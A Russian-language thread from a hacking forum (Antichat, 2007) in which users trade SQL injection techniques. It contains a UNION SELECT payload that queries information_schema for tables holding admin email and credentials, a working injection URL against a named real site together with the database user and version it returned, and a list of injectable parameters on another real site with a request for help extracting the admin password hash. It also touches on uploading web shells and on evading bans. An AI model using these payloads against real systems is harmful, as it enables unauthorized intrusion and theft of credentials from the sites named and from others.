13.11.2007, 17:49
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
Piflit, если кавычки экранируются, шелл не зальешь, ибо в них нужно будет указывать путь, в хексе он работать не будет
|
|
|
13.11.2007, 18:57
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами:
9881483
Репутация:
569
|
|
Подскажите возможно ли с помощью information_schema узнать таблицу в которой находится email админа,и как этот запрос должен быть составлен? Мыло админа известно,а вот таблица где должен по идее и хеш с логином лежать-нет ( конечно можно проверить каждую таблу на содержание интересующего,но их там более 500,а вывод колонок по 1 еденице. Пробовал наиболее вероятные таблицы-безрезультатно.
|
|
|
|
13.11.2007, 19:08
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
чтото типа этого
union select table_name from information_schema.columns where column_name like '%25mail%25'/*
вобще правильно ставить % в like, но лучше использовать url-кодировку
Это ты получаешь имя таблиц где есть поле в названии которого есть сочетание mail, а там limit`ом перебирай
можешь также подставлять user,admin,pass,login и т.д.
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 13.11.2007 в 19:17..
|
|
|
|
Подскажите в примерах,пож. |
14.11.2007, 18:04
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
С нами:
10002038
Репутация:
100
|
|
Подскажите в примерах,пож.
Что дальше делать с этим счастьем? Желательно подробно и в примерах...)
P.S. сам только учусь)
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(C ONCAT_WS(0x3A,VERSION(),USER(),DATABASE()),0x71),0 x71),7,8,9,10,11,12,13,14/*
Выводит:
4.1.15:d11071sa14532@z17.zone.ee:d11071sd8708 |
|
|
|
14.11.2007, 18:19
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами:
9763159
Репутация:
19
|
|
можно ли обойти бан по наомеру телефона?
|
|
|
|
14.11.2007, 21:36
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Подскажите пожайлуста статью по БД MySQL 4.x
|
|
|
|
14.11.2007, 22:02
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от ZAMUT
Подскажите пожайлуста статью по БД MySQL 4.x
Тебе про что? Про sql injection или просто хелп по этой версии?
__________________
Кто я?..
|
|
|
|
14.11.2007, 22:05
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
2I-I()/Ib SQL-инъекции..
|
|
|
|
14.11.2007, 22:14
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от ZAMUT
2I-I()/Ib SQL-инъекции..
Вообщем что тебе хочу сказать...
Первое посети вот это http://forum.antichat.ru/thread19610.html или почитай вот это http://forum.antichat.ru/thread43966.html
Во вторых писать специальные статьи под каждую версию это дебилизм...
В третих насколько я помню основное отличие MySQL 4.x от остальных это появление подзапросов, и отсутствие базы INFORMATION_SCHEMA которая появляется в 5 версии...
__________________
Кто я?..
|
|
|
|
14.11.2007, 22:21
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
www.purecoolness.com
Помогите разобраться, вот ссылка на SQL инъекцию
http://www.purecoolness.com/search.php?action=results&sid=3881&sortby=1'&order =
http://www.purecoolness.com/forumdisplay.php?sortby=1&order=1&datecut=1'
http://www.purecoolness.com/search.php?action=1'&uid=94
http://www.purecoolness.com/member.php?action=1'
http://www.purecoolness.com/editpost.php?pid=1'
Вообщем там такого мнооооого =)
Только я не знаю что с этим делать =(
Что деать дальше? Как узнать хеш\пароль админа?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
